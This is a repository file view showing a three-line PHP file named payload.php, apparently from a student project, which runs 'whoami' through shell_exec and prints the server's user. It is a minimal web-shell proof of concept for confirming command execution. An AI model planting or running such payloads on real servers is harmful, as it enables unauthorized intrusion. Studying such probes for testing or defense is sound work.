hallbarUtvecklingVT7/payload.php

3 lines
38 B
PHP
Raw Normal View History

2020-12-04 10:54:05 +01:00
<?php
echo shell_exec('whoami');
?>